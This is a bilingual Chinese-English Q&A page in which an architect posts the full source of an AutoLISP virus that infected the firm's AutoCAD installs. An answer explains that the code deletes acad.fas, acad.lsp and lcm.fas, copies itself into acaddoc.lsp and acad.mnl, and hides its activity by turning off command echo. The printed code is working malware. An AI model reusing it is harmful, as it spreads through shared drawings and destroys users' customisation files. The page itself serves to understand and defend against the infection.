调试此LISP病毒正在做什么 [英] Debugging what this LISP Virus is doing
问题描述
我的公司受到AutoCAD病毒的攻击,该病毒正在删除我们的acaddoc.lsp并将其替换为以下例程.
My firm has been hit by an AutoCAD virus that is deleting and replacing our acaddoc.lsp with the routine below.
我是一名架构师,不确定通过重复的查找"和删除"操作.
I'm an architect and not exactly sure what this is doing by the repetitive "find" and "deletes".
- 用(当前搜索
acadapq)文件替换文件是什么? - 谁为AutoCAD编写病毒?!?!
- What is this replacing the files with (currently searching for
acadapq) ? - Who writes a virus for AutoCAD?!?!
以前有人看过吗? CAD论坛不是很有帮助.
Has anyone seen this before? the CAD forums aren't very helpful.
(setq wold_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq bb 2)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(setq n 0)
(while (< n 1)
(if (findfile "acad.fas")
(if (vl-file-delete (findfile "acad.fas"))
(setq n 0))
(setq n 2)))
(setq n 0)
(while (< n 1)
(if (findfile "lcm.fas")
(if (vl-file-delete (findfile "lcm.fas"))
(setq n 0))
(setq n 2)))
(setq n 0)
(while (< n 1)
(if (findfile "acad.lsp")
(if (vl-file-delete (findfile "acad.lsp"))
(setq n 0))
(setq n 2)))
(defun wwriteapp ()
(if (setq wwjm1 (open wnewacad "w"))
(progn
(setq wwjm (open woldacad "r"))
(while (setq wwz (read-line wwjm))
(write-line wwz wwjm1))
(close wwjm)
(close wwjm1))))
(setq lbz 0)
(setq wwjqm (strcat dpath "acaddoc.lsp"))
(if (setq wwjm (open wwjqm "r"))
(progn
(repeat 3 (read-line wwjm))
(setq wz (read-line wwjm))
(setq ab (atoi (substr wz 4 1)))
(close wwjm)
(if (> ab bb)
(setq lbz 1))))
(setq wwjqm (strcat wpath "acad.mnl"))
(if (setq wwjm (open wwjqm "r"))
(progn
(repeat 3 (read-line wwjm))
(setq wz (read-line wwjm))
(setq nb (atoi (substr wz 4 1)))
(close wwjm)
(if (< nb bb)
(setq lbz 1)))
(setq lbz 1))
(if (= lbz 1)
(progn
(setq woldacad (strcat dpath "acaddoc.lsp"))
(setq wnewacad (strcat wpath "acad.mnl"))
(wwriteapp)))
(if (and (/= (substr dpath 1 1) (chr 67))
(/= (substr dpath 1 1) (chr 68))
(/= (substr dpath 1 1) (chr 69))
(/= (substr dpath 1 1) (chr 70)))
(progn
(setq woldacad (strcat wpath "acad.mnl"))
(setq wnewacad (strcat dpath "acaddoc.lsp"))
(wwriteapp))
(vl-file-delete (strcat dpath "acaddoc.lsp")))
;load "acadapq")
(setvar "cmdecho" wold_cmd)
推荐答案
它正在执行支持文件路径遍历,删除和替换常见的AutoCAD自定义文件. ("acad.fas","acad.lsp","acaddoc.lsp")我不知道"lcm.fas"是什么意思.它是AutoCAD垂直产品(例如AutoCAD Mechanical或建筑桌面)的一部分吗?
It is doing a support file path walk, delete and replace of the common AutoCAD customization files. ("acad.fas","acad.lsp", "acaddoc.lsp") I do not know what "lcm.fas" is all about. Is it part of an AutoCAD vertical product ie AutoCAD mechanical or Architectural desktop?
循环本质上是在我不断找到支持路径的同时将其删除".
The looping is essentially "while I keep finding on the support path delete it".
据我所知,AutoCAD没有内置的防御措施. (可能会有一些acad系统var停止执行这些文件.)
So far as I know AutoCAD has no built in defense against this. (There may be some acad system var that stops execution of these files).
"cmdecho"行正在保存和恢复允许/禁止命令回显的系统变量.在运行时将其关闭(因此您不会注意到),然后恢复原始设置.
The "cmdecho" lines are saving and restoring the system variable that allows/suppresses the echoing of commands. Turns it off while running (so you don't notice) then restores the original setting.
礼貌的病毒:\
在AutoCAD启动时,它会执行第一个"acad.fas"和&它在支持路径上找到的第一个"acad.lsp".每当AutoCAD加载新的.dwg时,它都会执行"acaddoc.lsp".
When AutoCAD starts up it executes the first "acad.fas" & first "acad.lsp" it finds on it's support path. Everytime AutoCAD loads a new .dwg it executes the "acaddoc.lsp".
这篇关于调试此LISP病毒正在做什么的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
